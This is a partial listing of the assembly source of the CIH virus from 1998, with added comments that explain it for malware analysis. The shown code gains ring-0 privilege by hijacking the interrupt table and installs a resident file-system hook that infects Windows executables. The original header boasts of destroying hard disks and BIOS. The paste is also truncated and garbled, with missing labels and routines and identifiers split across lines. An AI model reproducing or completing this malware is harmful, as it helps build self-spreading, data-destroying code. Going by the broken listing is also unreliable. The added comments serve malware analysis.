- ; ********************************************************************
- ********
- ; * The Virus Program Information
- *
- ; ********************************************************************
- ********
- ; *
- *
- ; * Designer : CIH Source : TTIT of TATUNG in Tai
- wan *
- ; * Create Date : 04/26/1998 Now Version : 1.4
- *
- ; * Modification Time : 05/31/1998
- *
- ; *
- *
- ; * Turbo Assembler Version 4.0 : tasm /m cih
- *
- ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
- *
- ; *
- *
- ; *===================================================================
- =======*
- ; * Modification History
- *
- ; *===================================================================
- =======*
- ; * v1.0 1. Create the Virus Program.
- *
- ; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
- *
- ; * 04/26/1998 3. Virus Code doesn't Reload into System.
- *
- ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
- ystem. *
- ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
- Hook. *
- ; * 6. When System Opens Existing PE File, the File will b
- e *
- ; * Infected, and the File doesn't be Reinfected.
- *
- ; * 7. It is also Infected, even the File is Read-Only.
- *
- ; * 8. When the File is Infected, the Modification Date an
- d Time *
- ; * of the File also don't be Changed.
- *
- ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
- Call *
- ; * Previous FileSystemApiHook, it will Call the Functi
- on *
- ; * that the IFS Manager Would Normally Call to Impleme
- nt *
- ; * this Particular I/O Request.
- *
- ; * 10. The Virus Size is only 656 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.1 1. Especially, the File that be Infected will not Incr
- ease *
- ; * it's Size... ^__^
- *
- ; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
- *
- ; * When Exception Error Occurs, Our OS System should b
- e in *
- ; * Windows NT. So My Cute Virus will not Continue to R
- un, *
- ; * it will Jmup to Original Application to Run.
- *
- ; * 3. Use Better Algorithm, Reduce Virus Code Size.
- *
- ; * 4. The Virus "Basic" Size is only 796 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
- *
- ; * 2. Modify the Bug of v1.1
- *
- ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
- ror. *
- ; * So When Open WinZip Self-Extractor ==> Don't Infect
- it. *
- ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
- *
- ; *===================================================================
- =======*
- ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
- Error. *
- ; * 2. Change the Date of Killing Computers.
- *
- ; * 05/31/1998 3. Modify Virus Version Copyright.
- *
- ; * 4. The Virus "Basic" Size is 1019 Bytes.
- *
- ; ********************************************************************
- ********
- ; NOTE(review): this page is the source of the historical CIH virus (1998, written
- ; against Windows 9x VMM/IFSMgr VxD internals) as copied from a paste site. It is
- ; annotated here for malware-analysis purposes only; it must not be assembled,
- ; linked or executed. The copy is incomplete and line-wrapped: the segment ends,
- ; the MyVirusStart entry code, the merge loop, the labels @0/@3/@6 and VirusSize
- ; are all missing, and several long lines were split so that a line starting with
- ; a bare word fragment (e.g. "tion", "= 0") is the tail of the line above it.
- ; .586P: Pentium instruction set with privileged instructions enabled, needed for
- ; the sidt, mov dr0 and cli/sti used below.
- .586P
- ; ********************************************************************
- ********
- ; * Original PE Executable File(Don't Modify this Section)
- *
- ; ********************************************************************
- ********
- ; Raw image of the minimal host PE that the virus body is appended to (the
- ; "Original PE Executable File" named in the banner above). Each db row is
- ; 8 bytes; the offsets in the comments are file offsets from 0. The segment's
- ; closing ENDS directive is not present in this paste.
- OriginalAppEXE SEGMENT
- FileHeader:
- ; 0000h: IMAGE_DOS_HEADER, e_magic = "MZ"
- db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
- db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
- db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- ; 003ch: e_lfanew = 00000080h, i.e. the PE header starts at file offset 80h
- db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
- ; 0040h: 16-bit DOS stub (push cs / pop ds / mov dx,0eh / mov ah,9 / int 21h /
- ; mov ax,4c01h / int 21h) followed by its "This program cannot be run in DOS
- ; mode." message, terminated by '$'
- db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
- db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
- db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
- db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
- db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
- db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
- db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
- db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- ; 0080h: "PE\0\0" signature; IMAGE_FILE_HEADER: Machine = 014ch (i386),
- ; NumberOfSections = 1
- db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
- ; 0088h: TimeDateStamp = 352068f1h, PointerToSymbolTable = 0
- db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
- ; 0090h: NumberOfSymbols = 0, SizeOfOptionalHeader = 0e0h, Characteristics = 010fh
- db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
- ; 0098h: IMAGE_OPTIONAL_HEADER32: Magic = 010bh (PE32), linker version 5.0,
- ; SizeOfCode = 1000h
- db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
- ; 00a0h: SizeOfInitializedData = 0, SizeOfUninitializedData = 0
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- ; 00a8h: AddressOfEntryPoint = 1010h, BaseOfCode = 1000h
- db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
- ; 00b0h: BaseOfData = 2000h, ImageBase = 00400000h (entry point is VA 00401010h)
- db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
- ; 00b8h: SectionAlignment = 1000h, FileAlignment = 200h
- db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
- ; 00c0h: OS version 4.0, image version 0.0
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- ; 00c8h: subsystem version 4.0, Win32VersionValue = 0
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- ; 00d0h: SizeOfImage = 2000h, SizeOfHeaders = 200h
- db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
- ; 00d8h: CheckSum = 0, Subsystem = 2 (Windows GUI), DllCharacteristics = 0
- db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
- ; 00e0h: SizeOfStackReserve = 100000h, SizeOfStackCommit = 1000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- ; 00e8h: SizeOfHeapReserve = 100000h, SizeOfHeapCommit = 1000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- ; 00f0h: LoaderFlags = 0, NumberOfRvaAndSizes = 16
- db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
- ; 00f8h-0177h: 16 data directories, all empty (no imports, exports or relocations)
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- ; 0178h: the single IMAGE_SECTION_HEADER should start here, but the rows that
- ; follow are almost all zero and do not decode to a section header, and the
- ; 0c3h (ret) that would form the stub's entry-point body at file offset 210h
- ; (raw data at 200h + RVA 1010h - 1000h) appears at offset 198h instead. Rows
- ; were most likely dropped when this listing was pasted; compare against an
- ; intact copy before relying on these bytes.
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- ; Trailer: a zero dword followed by the virus body size (VirusSize is defined
- ; outside this extract).
- dd 00000000h, VirusSize
- ; Ring-3 entry sequence of the CIH virus, annotated for analysis only. The
- ; procedure's first instructions (the MyVirusStart label, the push ebp and the
- ; fs:[0] exchange that the pops at the end undo, and the call/pop that defines
- ; @0 and loads ebx) are missing from this paste, so this block is incomplete
- ; from its first line. Registers as far as visible here:
- ;   ebx = runtime address of @0 (delta base for position-independent addressing)
- ;   ecx = runtime address of StopToRunVirusCode (= @1): the SEH handler, and the
- ;         base from which MyExceptionHook is located
- ;   eax = previous fs:[0] value (assumed from the missing entry lines)
- ;   ebp = original IDT gate offset for HookExceptionNumber (restored in ring 0)
- ;   esi = runtime address of MyExceptionHook (= @2), consumed by the ring-0 code
- lea ecx, StopToRunVirusCode-@0[ebx]
- ; The two pushes form an EXCEPTION_REGISTRATION-shaped record on the stack,
- ; {prev = eax, handler = ecx}; linking it into fs:[0] happens in the missing
- ; entry lines. Any fault in the privileged code below lands in StopToRunVirusCode.
- push ecx
- push eax
- ; *************************************
- ; * Let's Modify *
- ; * IDT(Interrupt Descriptor Table) *
- ; * to Get Ring0 Privilege... *
- ; *************************************
- ; sidt stores the 6-byte IDTR (limit:16, base:32) at [esp-2]; the dword popped
- ; back into ebx is therefore the IDT linear base. ebx then points at the upper
- ; dword of the 8-byte gate for HookExceptionNumber (offset bits 31..16 live in
- ; its high word, offset bits 15..0 in the gate's first word at [ebx-4]).
- push eax ;
- sidt [esp-02h] ; Get IDT Base Address
- pop ebx ;
- ; ZF ends up clear before the first int below (this add and the shr esi,16 further
- ; down both produce non-zero results); MyExceptionHook tests ZF to distinguish
- ; the first entry from the second, and the flags survive the int into the gate.
- add ebx, HookExceptionNumber*08h+04h ; ZF
- = 0
- ; cli and the IDT writes below rely on Windows 9x leaving IOPL and the IDT page
- ; accessible from ring 3. On an NT-family kernel the cli (or the IDT access)
- ; faults and the SEH handler StopToRunVirusCode hands control to the host.
- cli
- ; Save the original gate offset in ebp: high word from [ebx], low word from [ebx-4].
- mov ebp, [ebx] ; Get Exception Base
- mov bp, [ebx-04h] ; Entry Point
- ; Point the gate at MyExceptionHook (low 16 bits at gate+0, high 16 at gate+6).
- ; esi keeps the full MyExceptionHook address for the ring-0 code.
- lea esi, MyExceptionHook-@1[ecx]
- push esi
- mov [ebx-04h], si ;
- shr esi, 16 ; Modify Excep
- tion
- mov [ebx+02h], si ; Entry Point
- Address
- pop esi
- ; *************************************
- ; * Generate Exception to Get Ring0 *
- ; *************************************
- ; First software interrupt through the hijacked gate: MyExceptionHook runs at
- ; ring 0 on its ZF = 0 path (residency check / page allocation) and iretd's back
- ; to the instruction after this int.
- int HookExceptionNumber ; GenerateExce
- ption
- ; Address of the instruction following the first int. When the virus is already
- ; resident, MyExceptionHook adds (ReadyRestoreSE - this label) to the pushed
- ; return EIP so that execution resumes at ReadyRestoreSE instead.
- ReturnAddressOfEndException = $
- ; *************************************
- ; * Merge All Virus Code Section *
- ; *************************************
- ; The code that copies the virus body into the page allocated by the first
- ; ring-0 call belongs between these two banners but is absent from this paste;
- ; it is also what leaves ZF = 1 for the second int below. Not reconstructed here.
- ; *************************************
- ; * Generate Exception Again *
- ; *************************************
- ; Second entry into MyExceptionHook (ZF = 1 path): installs the file-system API
- ; hook, patches the IFSMgr install service and restores the original gate.
- int HookExceptionNumber ; GenerateExce
- ption Aga
- ; *************************************
- ; * Let's Restore *
- ; * Structured Exception Handing *
- ; *************************************
- ; Normal exit: re-enable interrupts (sti from ring 3, again Windows 9x only) and
- ; fall into the common teardown with ebx = 0 so fs:[ebx] addresses fs:[0].
- ReadyRestoreSE:
- sti
- xor ebx, ebx
- jmp RestoreSE
- ; *************************************
- ; * When Exception Error Occurs, *
- ; * Our OS System should be in NT. *
- ; * So My Cute Virus will not *
- ; * Continue to Run, it Jmups to *
- ; * Original Application to Run. *
- ; *************************************
- ; SEH handler / abort path, reached when any of the privileged code above faults.
- ; At this point fs:[0] presumably points at the exception dispatcher's own
- ; registration record, whose first (prev) field is the virus's record pushed at
- ; the top of this block; loading that into esp puts the stack back exactly where
- ; the normal path expects it, so the same teardown below can run.
- StopToRunVirusCode:
- @1 = StopToRunVirusCode
- xor ebx, ebx
- mov eax, fs:[ebx]
- mov esp, [eax]
- ; Unlink the virus's SEH record: pop the saved previous fs:[0] back, discard the
- ; handler address that was pushed as ecx.
- RestoreSE:
- pop dword ptr fs:[ebx]
- pop eax
- ; *************************************
- ; * Return Original App to Execute *
- ; *************************************
- ; Restore ebp (pushed by the missing entry code) and jump to the host's original
- ; entry point via push/ret. 00401000h is only a placeholder: the infection code
- ; (not in this extract) writes the host's real entry address over the dword at
- ; OriginalAddressOfEntryPoint.
- pop ebp
- push 00401000h ; Push Original
- OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
- tack
- ret ; Return to Original App Entry Point
- ; *********************************************************
- ; * Ring0 Virus Game Initial Program *
- ; *********************************************************
- ; Ring-0 handler of the CIH virus, annotated for analysis only. Entered through
- ; the hijacked IDT gate from the two "int HookExceptionNumber" instructions of
- ; the ring-3 code; each iretd returns to the instruction after the int that got
- ; here. Register state is inherited from ring 3:
- ;   ebx = address of the hijacked gate's upper dword
- ;   ebp = original gate offset
- ;   esi = runtime address of MyExceptionHook (@2)
- ;   edi = allocated system page (from the first call onwards)
- ; dr0 is abused as data: 0 means "not resident", later it holds the previous
- ; FileSystemApiHook address (per the inline comments). This paste split some
- ; identifiers across lines, e.g. "ReadyRestoreSE-Return / AddressOf / dException"
- ; is ReadyRestoreSE-ReturnAddressOfEndException (the label after the first int).
- MyExceptionHook:
- @2 = MyExceptionHook
- ; Dispatch on ZF carried in from ring 3: clear on the first int, set on the second.
- jz InstallMyFileSystemApiHook
- ; *************************************
- ; * Do My Virus Exist in System !? *
- ; *************************************
- ; dr0 == 0: no copy is resident yet, go allocate a page and become resident.
- mov ecx, dr0
- jecxz AllocateSystemMemoryPage
- ; Already resident: advance the pushed ring-3 return EIP ([esp] of the iretd
- ; frame) from ReturnAddressOfEndException to ReadyRestoreSE so the host skips
- ; the merge and the second int, then fall through to put the gate back.
- add dword ptr [esp], ReadyRestoreSE-Return
- AddressOf
- dException
- ; *************************************
- ; * Return to Ring3 Initial Program *
- ; *************************************
- ; Restore the original gate offset (low word at gate+0, high word at gate+6)
- ; from ebp and return to ring 3.
- ExitRing0Init:
- mov [ebx-04h], bp ;
- shr ebp, 16 ; Restore Exception
- mov [ebx+02h], bp ;
- iretd
- ; *************************************
- ; * Allocate SystemMemory Page to Use *
- ; *************************************
- ; First-time path. dr0 := ebx (non-zero) marks the virus as resident. ecx is 0
- ; here (jecxz was taken), so the zero arguments are pushed via ecx. The eight
- ; pushes are the arguments of the VMM _PageAllocate service (ID 0001:0053h in
- ; the dword after int 20h); by the VxD calling convention the first argument is
- ; the last push, i.e. 2 pages of type 1 with flags 0fh -- the meaning of each
- ; argument is assumed from the VMM service definition, which is not shown here.
- ; The int 20h / dd pair is the VxD dynamic-link stub that the VMM patches into a
- ; direct call the first time it executes. Note the gate is NOT restored on this
- ; path: it stays hijacked until the second int completes.
- AllocateSystemMemoryPage:
- mov dr0, ebx ; Set the Mark of My V
- irus Exis
- in System
- push 00000000fh ;
- push ecx ;
- push 0ffffffffh ;
- push ecx ;
- push ecx ;
- push ecx ;
- push 000000001h ;
- push 000000002h ;
- int 20h ; VMMCALL _PageAllocat
- e
- _PageAllocate = $ ;
- dd 00010053h ; Use EAX, ECX, EDX, a
- nd flags
- ; Caller removes the 8 dword arguments. The returned address goes to edi; eax is
- ; then set to the runtime address of MyVirusStart (esi = @2) for the ring-3 code
- ; that copies the virus body into the new page.
- add esp, 08h*04h
- xchg edi, eax ; EDI = SystemMemory S
- tart Addr
- s
- lea eax, MyVirusStart-@2[esi]
- iretd ; Return to Ring3 Initial Program
- ; *************************************
- ; * Install My File System Api Hook *
- ; *************************************
- ; Second-entry path (ZF = 1). Registers the virus's FileSystemApiHook -- the copy
- ; inside the allocated page at edi; @6 is defined outside this extract -- with
- ; the IFS manager, then redirects the IFSMgr_InstallFileSystemApiHook service
- ; itself so that every later hook installer goes through the virus (see
- ; InstallFileSystemApiHook below, which keeps the virus first in the chain).
- InstallMyFileSystemApiHook:
- lea eax, FileSystemApiHook-@6[edi]
- push eax ;
- ; IFSMgr service 0040:0067h. Its return value (the previously installed hook,
- ; per the inline comment) is parked in dr0; eax is restored to the hook address.
- int 20h ; VXDCALL IFSMgr_InstallFileSyste
- mApiHook
- IFSMgr_InstallFileSystemApiHook = $ ;
- dd 00400067h ; Use EAX, ECX, EDX, a
- nd flags
- mov dr0, eax ; Save OldFileSystemAp
- iHook Add
- ss
- pop eax ; EAX = FileSystemApiHook Addr
- ess
- ; Save Old IFSMgr_InstallFileSystemApiHook Ent
- ry Point
- ; Service-table patch. "mov ecx, CONST[esi]" is a memory load: after the call
- ; above the VMM has presumably rewritten the int 20h stub into an indirect call,
- ; so the dword at IFSMgr_InstallFileSystemApiHook now holds the address of the
- ; service-table slot. ecx = slot address, edx = current service entry point,
- ; saved to OldInstallFileSystemApiHook (@3 is defined outside this extract; the
- ; comment on "pop eax" suggests it is the FileSystemApiHook base). The slot is
- ; then overwritten with the virus's InstallFileSystemApiHook. Confirm this
- ; reading against the VMM dynamic-link behaviour before relying on it.
- mov ecx, IFSMgr_InstallFileSystemApiHook-@
- 2[esi]
- mov edx, [ecx]
- mov OldInstallFileSystemApiHook-@3[eax], e
- dx
- ; Modify IFSMgr_InstallFileSystemApiHook Entry
- Point
- lea eax, InstallFileSystemApiHook-@3[eax]
- mov [ecx], eax
- ; Interrupts are disabled before restoring the gate; the ring-3 code re-enables
- ; them with sti at ReadyRestoreSE.
- cli
- jmp ExitRing0Init
- ; *********************************************************
- ; * Code Size of Merge Virus Code Section *
- ; *********************************************************
- ; Assembly-time offset of this point, i.e. the size of the code preceding the
- ; hook routines. Its name says it bounds the section copied into the allocated
- ; page, but the merge code that would consume it is not in this extract.
- CodeSizeOfMergeVirusCodeSection = offset $
- ; *********************************************************
- ; * IFSMgr_InstallFileSystemApiHook *
- ; *********************************************************
- ; Replacement for the IFSMgr_InstallFileSystemApiHook service, written into the
- ; service table by MyExceptionHook (analysis annotation only). Called like the
- ; service it replaces, with one stack argument: the client's hook procedure at
- ; [esp+4] on entry. Its purpose is to keep the virus's FileSystemApiHook at the
- ; head of the IFS hook chain whenever another component installs a hook:
- ;   1. remove the virus hook,
- ;   2. install the client's hook through the saved original service,
- ;   3. re-install the virus hook through the same original service,
- ;   4. return to the client what step 2 returned.
- ; dr0 is updated to whatever now sits behind the virus hook (its "previous
- ; hook" pointer, per the inline comment). Preserves ebx; clobbers eax, ecx and
- ; whatever the two IFSMgr services clobber.
- InstallFileSystemApiHook:
- push ebx
- ; Position-independent self-location: ebx = runtime address of FileSystemApiHook.
- call @4 ;
- @4: ;
- pop ebx ; mov ebx, offset FileSystemAp
- iHook
- add ebx, FileSystemApiHook-@4 ;
- ; IFSMgr_RemoveFileSystemApiHook (service 0040:0068h) with the virus hook as its
- ; argument; the argument is popped back off afterwards (caller cleanup).
- push ebx
- int 20h ; VXDCALL IFSMgr_RemoveFileSystem
- ApiHook
- IFSMgr_RemoveFileSystemApiHook = $
- dd 00400068h ; Use EAX, ECX, EDX, a
- nd flags
- pop eax
- ; Call Original IFSMgr_InstallFileSystemApiHoo
- k
- ; to Link Client FileSystemApiHook
- ; Stack here: [esp] = saved ebx, [esp+4] = return address, [esp+8] = client hook.
- ; Forward the client's argument to the saved original entry point (addressed
- ; @3-relative from the hook base; @3 is defined outside this extract).
- push dword ptr [esp+8]
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- ; Keep the client's result while the virus hook is put back in front.
- push eax
- ; Call Original IFSMgr_InstallFileSystemApiHoo
- k
- ; to Link My FileSystemApiHook
- push ebx
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- ; The hook returned here is the one now chained behind the virus's own.
- mov dr0, eax ; Adjust OldFileSystem
- ApiHook A
- ress
- pop eax
- pop ebx
- ret
- ; *********************************************************
- ; * Static Data *
- ; *********************************************************
- ; Saved original IFSMgr_InstallFileSystemApiHook entry point: written by
- ; MyExceptionHook when it patches the service table and called through by
- ; InstallFileSystemApiHook; both address it relative to @3 (defined outside
- ; this extract). The paste ends here; the remaining data and code are missing.
- OldInstallFileSystemApiHook dd ?
- &nb